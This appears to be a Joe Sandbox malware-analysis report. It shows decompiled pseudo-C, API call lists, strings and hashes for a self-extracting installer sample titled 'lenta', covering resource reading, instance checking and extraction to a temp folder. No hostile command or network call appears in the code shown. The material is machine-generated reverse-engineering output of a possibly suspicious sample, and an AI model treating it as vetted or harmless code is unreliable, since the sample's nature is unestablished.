					__eflags =  *0x79a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x791e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E000744B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x791e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x791e5 - 3;
						if(_t49 - 0x791e5 < 3) {
							goto L32;
						}
						_t24 =  *0x791e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x791e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E0007658A(0x791e4, 0x104, 0x71140);
								_t27 = E000758C8(0x791e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x791e4 - 0x5c;
									if( *0x791e4 != 0x5c) {
										L30:
										_t30 = E0007597D(0x791e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x791e5 - 0x5c;
									if( *0x791e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E000744B9(_t64, 0x54a, 0x791e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x791e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x791e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x791e4 - 0x5c;
						if( *0x791e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x79124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x79a3c, 0x3e8, 0x78598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00074224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x787a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E000744B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x0007321b
0x0007321e
0x00073221
0x0007343c
0x0007343e
0x0007343f
0x00073445
0x00073447
0x00000000
0x00073447
0x00073229
0x0007322a
0x0007322f
0x000733ec
0x000733f7
0x00073410
0x00073416
0x0007341d
0x0007342d
0x0007342d
0x00073438
0x00000000
0x00073438
0x00073237
0x00073243
0x00073243
0x00073246
0x000732ee
0x000732f4
0x000732f6
0x000733d4
0x000733d6
0x000733db
0x000733dc
0x000733de
0x000733df
0x00073370
0x00073372
0x00000000
0x00073372
0x000732fc
0x00073301
0x00073301
0x00073303
0x00073304
0x00073304
0x0007330a
0x0007330d
0x00000000
0x00000000
0x00073313
0x00073318
0x0007331a
0x00073331
0x00073332
0x0007333a
0x0007333d
0x0007337c
0x00073388
0x0007338f
0x00073394
0x00073396
0x000733a4
0x000733ab
0x000733b6
0x000733be
0x000733c3
0x000733c5
0x00073435
0x00073437
0x00073437
0x00000000
0x00073437
0x000733c7
0x000733c9
0x000733cc
0x00000000
0x000733cc
0x000733ad
0x000733b4
0x00000000
0x00000000
0x00000000
0x000733b4
0x00073398
0x00073399
0x0007339b
0x0007339c
0x0007339d
0x00000000
0x0007339d
0x0007334c
0x00073351
0x00073354
0x00000000
0x00000000
0x0007335c
0x00073362
0x00073364
0x00000000
0x00000000
0x00073366
0x00073367
0x00073369
0x0007336a
0x0007336b
0x00000000
0x0007336b
0x0007331c
0x00073323
0x00000000
0x00000000
0x00073329
0x0007332b
0x00000000
0x00000000
0x00000000
0x0007332b
0x0007324c
0x0007324c
0x0007324f
0x000732c8
0x000732ce
0x00000000
0x000732ce
0x00073251
0x00073256
0x00000000
0x00000000
0x00073271
0x00073277
0x00073279
0x00073298
0x0007329d
0x0007329f
0x00000000
0x00000000
0x000732b0
0x000732b6
0x000732b8
0x00000000
0x00000000
0x000732be
0x00073280
0x00073289
0x0007328e
0x00000000
0x0007328e
0x0007327b
0x00000000
0x0007327b
0x00000000

APIs

LoadStringA.USER32(000003E8,00078598,00000200), ref: 00073271
GetDesktopWindow.USER32 ref: 000733E2
SetWindowTextA.USER32(?,lenta), ref: 000733F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00073410
GetDlgItem.USER32(?,00000836), ref: 00073426
EnableWindow.USER32(00000000), ref: 0007342D
EndDialog.USER32(?,00000000), ref: 0007343F

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 000732E2, 000732E7, 00073331, 00073344, 0007335B, 0007336A
lenta, xrefs: 000733F1

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$lenta
API String ID: 2418873061-955332767
Opcode ID: c4dbd72cb1702ad59c57315722d70ca7d43b8adcb2330a54fb215d6944dda8eb
Instruction ID: 3180431b8d3b3942109ae52e8805b9c89f423a229b5b99856681c7ee0e9ade52
Opcode Fuzzy Hash: c4dbd72cb1702ad59c57315722d70ca7d43b8adcb2330a54fb215d6944dda8eb
Instruction Fuzzy Hash: E3513770F8124076FB751B355C8CFBF2A88DB86B51F50C028F64DB61C1CAAC9B42B269

Uniqueness

Uniqueness Score: -1.00%

Function 00072CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00072CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x78004; // 0xdaa0d862
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x79a3c = __ecx;
				memset(0x79140, 0, 0x8fc);
				memset(0x78a20, 0, 0x32c);
				memset(0x788c0, 0, 0x104);
				 *0x793ec = 1;
				_t20 = E0007468F("TITLE", 0x79154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x7858c = _t27;
					SetEvent(_t27);
					_t64 = 0x79a34;
					if(E0007468F("EXTRACTOPT", 0x79a34, 4) != 0) {
						if(( *0x79a34 & 0x000000c0) == 0) {
							L12:
							 *0x79120 =  *0x79120 & _t65;
							if(E00075C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x78a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x78184 != 0) {
										__imp__#17();
									}
									if( *0x78a24 == 0) {
										_t57 = _t65;
										if(E000736EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x79a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x79a34 & 0x00000100) == 0 || ( *0x78a38 & 0x00000001) != 0 || E000718A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00076517(_t57, 0x7d6, _t34, E000719E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00072390(0x78a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E000744B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0007468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x78588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x79a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E000744B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E000744B9(0, 0x54b, "lenta", 0, 0x10, 0);
										L11:
										CloseHandle( *0x78588);
										 *0x79124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E000744B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x79124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00076CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x00072cb5
0x00072cbc
0x00072cc7
0x00072cc9
0x00072cd1
0x00072cd3
0x00072cd9
0x00072ce9
0x00072cf9
0x00072d0e
0x00072d15
0x00072d1c
0x00072ef3
0x00000000
0x00072d2d
0x00072d34
0x00072d3b
0x00072d40
0x00072d48
0x00072d59
0x00072d84
0x00072e1f
0x00072e1f
0x00072e2e
0x00072e41
0x00072e5a
0x00072e62
0x00072e6c
0x00072e6c
0x00072e75
0x00072e77
0x00072e77
0x00072e84
0x00072e8b
0x00072e94
0x00000000
0x00072e96
0x00072e96
0x00072e9e
0x00072ea2
0x00072eba
0x00000000
0x00072ece
0x00072ede
0x00072eed
0x00000000
0x00000000
0x00000000
0x00000000
0x00072eed
0x00072eef
0x00072eef
0x00072eef
0x00072eef
0x00072ea2
0x00072e86
0x00072e88
0x00072e88
0x00072e43
0x00072e48
0x00000000
0x00072e48
0x00072e30
0x00072e30
0x00072ef8
0x00072f01
0x00000000
0x00072f01
0x00072d8a
0x00072d8f
0x00072da1
0x00000000
0x00072da3
0x00072dae
0x00072db4
0x00072dbb
0x00000000
0x00072dca
0x00072dd3
0x00072df5
0x00072e02
0x00000000
0x00000000
0x00000000
0x00000000
0x00072dd5
0x00072dde
0x00072de3
0x00072e04
0x00072e0a
0x00072e10
0x00000000
0x00072e10
0x00072dd3
0x00072dbb
0x00072da1
0x00072d5b
0x00072d5b
0x00072d5d
0x00072d69
0x00072d6e
0x00072f06
0x00072f06
0x00072f06
0x00072d59
0x00072f18

APIs

memset.MSVCRT ref: 00072CD9
memset.MSVCRT ref: 00072CE9
memset.MSVCRT ref: 00072CF9

Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746A0
Part of subcall function 0007468F: SizeofResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746A9
Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746C3
Part of subcall function 0007468F: LoadResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746CC
Part of subcall function 0007468F: LockResource.KERNEL32(00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746D3
Part of subcall function 0007468F: memcpy_s.MSVCRT ref: 000746E5
Part of subcall function 0007468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000746EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00072D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00072D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00072DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00072DBD
CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00072E0A

Part of subcall function 000744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
Part of subcall function 000744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00074554

Strings

INSTANCECHECK, xrefs: 00072D95
lenta, xrefs: 00072D04, 00072DD9, 00072DF0
EXTRACTOPT, xrefs: 00072D4D
VERCHECK, xrefs: 00072E54
TITLE, xrefs: 00072D09

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
API String ID: 1002816675-2993962200
Opcode ID: b4f9448694f1d4d3614dbca52d75eba6b33c0b6eafdd11b3f8c564aaf0ca2ca8
Instruction ID: bf8c8eeab41b6ca2bd4a6369cc46c3b46a86eae97df5de37332a809d69341150
Opcode Fuzzy Hash: b4f9448694f1d4d3614dbca52d75eba6b33c0b6eafdd11b3f8c564aaf0ca2ca8
Instruction Fuzzy Hash: 4D51B370F403016AF7A0A7249C4ABBA26D8EB85700F40C439FA4DE51D2DBBC8891C76E

Uniqueness

Uniqueness Score: -1.00%

Function 000734F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E000734F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x791d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x78584 = _t35;
					E000743D0(_t35, GetDesktopWindow());
					__eflags =  *0x78184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "lenta");
					_t17 = CreateThread(0, 0, E00074FE0, 0, 0, 0x78798);
					 *0x7879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E000744B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x7858c);
					_t38 =  *0x78584; // 0x0
					_t25 = E000744B9(_t38, 0x4b2, 0x71140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x791d8 = 1;
						SetEvent( *0x7858c);
						_t39 =  *0x7879c; // 0x0
						E00073680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x7858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x7879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x000734fb
0x000734fe
0x00073665
0x00073666
0x00073666
0x00073668
0x0007366e
0x0007366e
0x00073671
0x00073671
0x00073677
0x00000000
0x00073677
0x00073504
0x00073506
0x00073507
0x0007350c
0x0007365b
0x0007365f
0x00000000
0x00000000
0x00000000
0x00073661
0x00073512
0x00073515
0x000735be
0x000735c1
0x000735d1
0x000735d8
0x000735de
0x000735f8
0x00073617
0x00073617
0x00073623
0x00073637
0x0007363d
0x00073642
0x00073644
0x00000000
0x00073646
0x00073652
0x00073657
0x00073658
0x00000000
0x00073658
0x00073644
0x0007351b
0x0007351d
0x0007354f
0x00073553
0x00000000
0x00000000
0x0007355f
0x00073565
0x0007357c
0x00073581
0x00073584
0x0007359b
0x000735a1
0x000735a7
0x000735ad
0x000735b3
0x000735b8
0x00000000
0x000735b8
0x00073586
0x00073588
0x00000000
0x00000000
0x00073590
0x00000000
0x00073590
0x00073524
0x00073535
0x00073541
0x00000000
0x00073549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 00073535
EndDialog.USER32(?,?), ref: 00073541
ResetEvent.KERNEL32 ref: 0007355F
SetEvent.KERNEL32(00071140,00000000,00000020,00000004), ref: 00073590
GetDesktopWindow.USER32 ref: 000735C7
GetDlgItem.USER32(?,0000083B), ref: 000735F1
SendMessageA.USER32(00000000), ref: 000735F8
GetDlgItem.USER32(?,0000083B), ref: 00073610
SendMessageA.USER32(00000000), ref: 00073617
SetWindowTextA.USER32(?,lenta), ref: 00073623
CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,00078798), ref: 00073637
EndDialog.USER32(?,00000000), ref: 00073671

Strings

lenta, xrefs: 0007361D

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: lenta
API String ID: 2406144884-2780258678
Opcode ID: 2eb072d831cca9a919e82f6e79e397fee45d316fda184db11921ac8c81379baf
Instruction ID: b1d103859cdf4ba026f1119884b41899fb2238c178f2d93c5a0600a0ed343aab
Opcode Fuzzy Hash: 2eb072d831cca9a919e82f6e79e397fee45d316fda184db11921ac8c81379baf
Instruction Fuzzy Hash: 46319271F44300BBF7601B25AC4DE6F3AA8E7C6B11F50C525F60EA52A1CA7D8980EB59

Uniqueness

Uniqueness Score: -1.00%

Function 00074224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00074224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E000744B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x788c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x787a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x78598;
					_v36 = 1;
					_v32 = E00074200;
					_v28 = 0x788c0;
					 *0x7a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x7a288(_t32, 0x788c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x788c0 != 0) {
							E00071680(0x787a0, 0x104, 0x788c0);
						}
						 *0x7a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x787a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x788c0);
					_t61 = 0x788c0;
					_t4 =  &(_t61[1]); // 0x788c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x788c0; // 0xf1181
					_t44 = CharPrevA(0x788c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x788c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x00074234
0x0007423c
0x00074240
0x000743b2
0x000743b7
0x000743c0
0x00000000
0x000743c5
0x0007424c
0x00074252
0x00074257
0x000743a4
0x000743a5
0x000743ab
0x00000000
0x000743ab
0x00074263
0x00074269
0x0007426e
0x00000000
0x00000000
0x0007427a
0x00074280
0x00074285
0x00000000
0x00000000
0x0007428d
0x00074293
0x000742e6
0x000742e9
0x000742ef
0x000742f4
0x000742f7
0x00074300
0x00074307
0x0007430e
0x00074315
0x0007431c
0x00074322
0x00074326
0x0007432d
0x0007432d
0x0007432f
0x00074334
0x00074343
0x00074349
0x0007434d
0x00074354
0x00074354
0x0007435d
0x0007436e
0x0007436e
0x0007437d
0x00074383
0x00074387
0x0007438e
0x0007438e
0x00074387
0x00074391
0x00074399
0x00000000
0x00074295
0x0007429f
0x000742a5
0x000742aa
0x000742aa
0x000742ad
0x000742ad
0x000742af
0x000742b0
0x000742b6
0x000742c2
0x000742c8
0x000742ce
0x000742e4
0x000742e4
0x00000000
0x000742ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00074236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0007424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 00074263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0007427A
GetTempPathA.KERNEL32(00000104,000788C0,?,00000001), ref: 0007429F
CharPrevA.USER32(000788C0,000F1181,?,00000001), ref: 000742C2
CharPrevA.USER32(000788C0,00000000,?,00000001), ref: 000742D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00074391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 000743A5

Strings

SHGetPathFromIDList, xrefs: 00074274
SHELL32.DLL, xrefs: 0007422F
SHBrowseForFolder, xrefs: 00074246

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: 0997d8b743ddf26c714cd288276881d1f410830e3d31450b11c14ab69dacae65
Instruction ID: 40020bea1a6ef6b6008a9606bdc7bf8254fcffd9a4130ccf691812e2e710cf16
Opcode Fuzzy Hash: 0997d8b743ddf26c714cd288276881d1f410830e3d31450b11c14ab69dacae65
Instruction Fuzzy Hash: D4410474E40200AFE751AB74DC88AAE7BB4EB45344F44C4A9E94DA7252CF7C8D41C77A

Uniqueness

Uniqueness Score: -1.00%

Function 000744B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E000744B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x78004; // 0xdaa0d862
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x78a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x79a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00071680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E0007171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0007171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0007681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E000767C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
